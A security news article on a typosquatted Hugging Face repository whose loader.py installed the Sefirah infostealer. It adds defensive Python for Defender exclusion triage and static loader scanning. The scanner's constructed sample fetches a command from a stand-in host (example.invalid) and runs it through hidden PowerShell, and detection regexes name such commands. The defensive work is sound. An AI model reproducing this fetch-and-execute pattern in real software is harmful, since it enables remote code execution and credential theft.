"The repository had typosquatted OpenAI's legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a loader.py file that fetches and executes infostealer malware on Windows machines," HiddenLayer researchers wrote.
HiddenLayer's discovery and the Hugging Face surge
Researchers at HiddenLayer discovered the malicious repository on May 7 after spotting an entry named Open-OSS/privacy-filter on Hugging Face. The repository briefly climbed to #1 on the platform's trending list and accumulated 244,000 downloads before Hugging Face removed it following reports. The platform, which hosts pre-trained AI models, datasets, and ML tools, lets developers publish model weight files, configuration, and code side by side; the attackers exploited that by cloning the look of a legitimate release and slipping their own code in alongside it.
loader.py: a benign-looking Python script that wasn't
The repository's loader.py was padded with fake AI-related code to look harmless. HiddenLayer's analysis showed that the script disabled SSL certificate verification, decoded a base64-encoded URL pointing to an external server, fetched a JSON payload from it, and executed the PowerShell command that payload contained. That command ran in a hidden window, downloaded a batch file named start.bat, and launched a multi-step chain that ended with installation of the final payload.
start.bat to sefirah: escalation and persistence
The batch file performed privilege escalation and downloaded the final payload, identified as Sefirah. According to HiddenLayer, the chain added the payload to Microsoft Defender's exclusions before executing it. Sefirah is a Rust-based infostealer that collects a wide range of sensitive material, compresses it, and exfiltrates it to a command-and-control server at recargapopular[.]com.
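A detection-side counterpart to the Defender-exclusion step, added here as an example and not HiddenLayer's tooling: Defender writes a configuration-change event (ID 5007) to the Microsoft-Windows-Windows Defender/Operational log when an exclusion is added or real-time protection is toggled. The sample events below are constructed, and their exact message wording is an assumption modelled on that event; the registry-path and risk heuristics are likewise assumptions chosen for this example. The triage flags exclusions that land under user-writable directories, which is where a loader dropped into a profile would sit, and any new value that disables real-time protection.

```python
import re

# Constructed sample events modelled on Defender's configuration-change
# event (ID 5007).  Wording is an assumption, not copied from a real host.
SAMPLE_EVENTS = [
    {"EventID": 5007, "Message":
     "Microsoft Defender Antivirus Configuration has changed.\r\n"
     "\tOld value: \r\n"
     "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
     "C:\\Users\\alice\\AppData\\Local\\Temp\\ = 0x0"},
    {"EventID": 5007, "Message":
     "Microsoft Defender Antivirus Configuration has changed.\r\n"
     "\tOld value: \r\n"
     "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
     "C:\\Program Files\\SQL Server\\ = 0x0"},
    {"EventID": 5007, "Message":
     "Microsoft Defender Antivirus Configuration has changed.\r\n"
     "\tOld value: \r\n"
     "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\"
     "DisableRealtimeMonitoring = 0x1"},
    {"EventID": 1116, "Message": "Microsoft Defender Antivirus has detected malware."},
]

# Assumed registry layout for exclusions and real-time protection settings.
EXCLUSION_RE = re.compile(
    r"Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\(.+?)\s*=\s*0x0", re.I)
TAMPER_RE = re.compile(r"Real-Time Protection\\(\w+)\s*=\s*0x1", re.I)
# Directories an unprivileged user can write to; an exclusion here is the
# classic "exclude my own dropper" pattern.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)


def triage_defender_events(events):
    """Return findings for 5007 events that add exclusions or disable protection."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5007:
            continue
        msg = ev.get("Message", "")
        new_value = msg.split("New value:", 1)[1] if "New value:" in msg else ""
        m = EXCLUSION_RE.search(new_value)
        if m:
            kind, target = m.group(1), m.group(2).strip()
            findings.append({
                "type": "exclusion_added",
                "kind": kind,
                "target": target,
                "high_risk": bool(USER_WRITABLE_RE.search(target)),
            })
            continue
        t = TAMPER_RE.search(new_value)
        if t:
            findings.append({
                "type": "protection_disabled",
                "setting": t.group(1),
                "high_risk": True,
            })
    return findings


if __name__ == "__main__":
    for f in triage_defender_events(SAMPLE_EVENTS):
        print(f)
```

On a live host the same events can be pulled with `Get-WinEvent -LogName "Microsoft-Windows-Windows Defender/Operational" -FilterXPath "*[System[EventID=5007]]"` and fed in as dictionaries of EventID and Message; a program-directory exclusion like the second sample is routine administration, while an exclusion under a user profile immediately followed by process execution from that path is the sequence the article describes.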
Sefirah's target list and anti-analysis features
HiddenLayer cataloged the infostealer's targeted artifacts. The malware harvests browser data from Chromium- and Gecko-based browsers (including cookies, saved passwords, encryption keys, browsing data, and session tokens); Discord tokens, local databases, and master keys; cryptocurrency wallets and wallet browser extensions; SSH, FTP, and VPN credentials and configuration files (including FileZilla); sensitive local files and wallet seeds/keys; system information; and multi-monitor screenshots.
The researchers also noted extensive anti-analysis capabilities: checks for virtual machines, sandboxes, debuggers, and analysis tools intended to evade detection and complicate forensic review.
Reach, artifacts, and related campaigns
HiddenLayer cautioned that the exact number of victims is unclear. The researchers observed 667 accounts that liked the malicious repository, but most of them appear to be auto-generated, and the 244,000 download figure may itself have been artificially inflated. By pivoting on those accounts and on shared artifacts, HiddenLayer uncovered other repositories using the same loader infrastructure and noted overlaps with an npm typosquatting campaign that distributed the WinOS 4.0 implant.
What this means for security teams, Hugging Face, and affected users
- Security teams and AI/ML researchers: The campaign demonstrates how model-hosting platforms can be abused via typosquatting and cloned model cards; teams should treat code shipped alongside downloaded models as untrusted and review it for loader-like behavior (disabled SSL checks, base64-decoded fetches, and execution of an externally fetched JSON payload).
- Hugging Face and platform operators: The incident underscores a need to rapidly triage trending content and validate publisher identity; Hugging Face removed the repository after reports, but the rapid climb to #1 and the high download count illustrate how quickly malicious content can spread on the platform.
- End users who downloaded files: HiddenLayer advises reimaging affected machines, rotating all stored credentials, replacing cryptocurrency wallets and seed phrases, and invalidating browser sessions and tokens — concrete steps rooted in the malware's stated capabilities.
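The loader indicators named above (disabled SSL verification, a base64-decoded URL, an external fetch, hidden PowerShell execution) can be checked statically before any model code is run. The following is an added example of such a triage scanner, not HiddenLayer's tooling and not the real loader.py: it walks a script's AST and reports which indicators appear and on which lines. The two sample scripts are constructed for this example; the suspicious one contains no real URL or payload, and the indicator sets and weights are assumptions, not a vendor signature set.

```python
import ast
import base64
import re

# Indicator sets and weights are heuristics chosen for this example.
UNVERIFIED_SSL = {"ssl._create_unverified_context"}
DECODE_CALLS = {"base64.b64decode", "base64.urlsafe_b64decode"}
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "requests.post"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.popen"}
DYNAMIC_EXEC = {"exec", "eval"}
URL_RE = re.compile(r"^https?://", re.I)
HIDDEN_PS_RE = re.compile(r"powershell.*(-w(?:indowstyle)?\s+hidden|-enc|-nop)", re.I | re.S)
WEIGHTS = {"unverified_ssl": 2, "verify_false": 2, "b64_decoded_url": 3,
           "network_fetch": 1, "dynamic_exec": 2, "subprocess": 1, "hidden_powershell": 4}


def _dotted(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _strings(node):
    """All string literals beneath a node (used to inspect command lines)."""
    return [c.value for c in ast.walk(node)
            if isinstance(c, ast.Constant) and isinstance(c.value, str)]


def scan_loader(source):
    """Map indicator name -> sorted line numbers where it occurs in `source`."""
    hits = {k: set() for k in WEIGHTS}
    for node in ast.walk(ast.parse(source)):
        # Catches both ssl._create_unverified_context() and the monkey-patch
        # ssl._create_default_https_context = ssl._create_unverified_context
        if isinstance(node, ast.Attribute) and _dotted(node) in UNVERIFIED_SSL:
            hits["unverified_ssl"].add(node.lineno)
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func) or ""
        if name in FETCH_CALLS:
            hits["network_fetch"].add(node.lineno)
        if name in DYNAMIC_EXEC:
            hits["dynamic_exec"].add(node.lineno)
        if name in EXEC_CALLS:
            hits["subprocess"].add(node.lineno)
            if HIDDEN_PS_RE.search(" ".join(_strings(node))):
                hits["hidden_powershell"].add(node.lineno)
        # Decode literal base64 arguments and flag ones that turn into URLs.
        if name in DECODE_CALLS and node.args and isinstance(node.args[0], ast.Constant) \
                and isinstance(node.args[0].value, str):
            try:
                decoded = base64.b64decode(node.args[0].value, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                decoded = ""
            if URL_RE.match(decoded):
                hits["b64_decoded_url"].add(node.lineno)
        for kw in node.keywords:  # requests.get(url, verify=False)
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                hits["verify_false"].add(node.lineno)
    return {k: sorted(v) for k, v in hits.items() if v}


def triage(source, threshold=6):
    """Score a script; `threshold` is an assumed cut-off for manual review."""
    hits = scan_loader(source)
    score = sum(WEIGHTS[k] for k in hits)
    return {"score": score, "suspicious": score >= threshold, "indicators": hits}


# Constructed samples.  The suspicious one mirrors the described pattern only
# in shape: the decoded URL is https://example.invalid/p and nothing is run.
BENIGN_SAMPLE = '''\
import json
def load_model(path):
    with open(path) as f:
        return json.load(f)
'''
SUSPICIOUS_SAMPLE = '''\
import ssl, json, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context

def load_model(path):  # decoy AI-looking code
    return {"weights": path}

url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcA==").decode()
cfg = json.loads(urllib.request.urlopen(url).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''

if __name__ == "__main__":
    print(triage(BENIGN_SAMPLE))
    print(triage(SUSPICIOUS_SAMPLE))
```

The scanner never executes the file it inspects, so it is safe to run over every .py in a freshly cloned model repository before anything imports it; a repository whose only Python file scores this high while its model card claims to be a thin wrapper around published weights is the mismatch worth escalating.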
The campaign combines straightforward social engineering, typosquatting a legitimate project and copying its model card, with a layered technical chain that moves from Python to PowerShell to a Rust-based infostealer. While the repository was removed and researchers traced linkages to other malicious infrastructure, the exact victim count and the extent of credential compromise remain unresolved. Who downloaded the malicious package, and how many installations persist despite removal from the hosting platform, are the concrete, unanswered questions left by this campaign.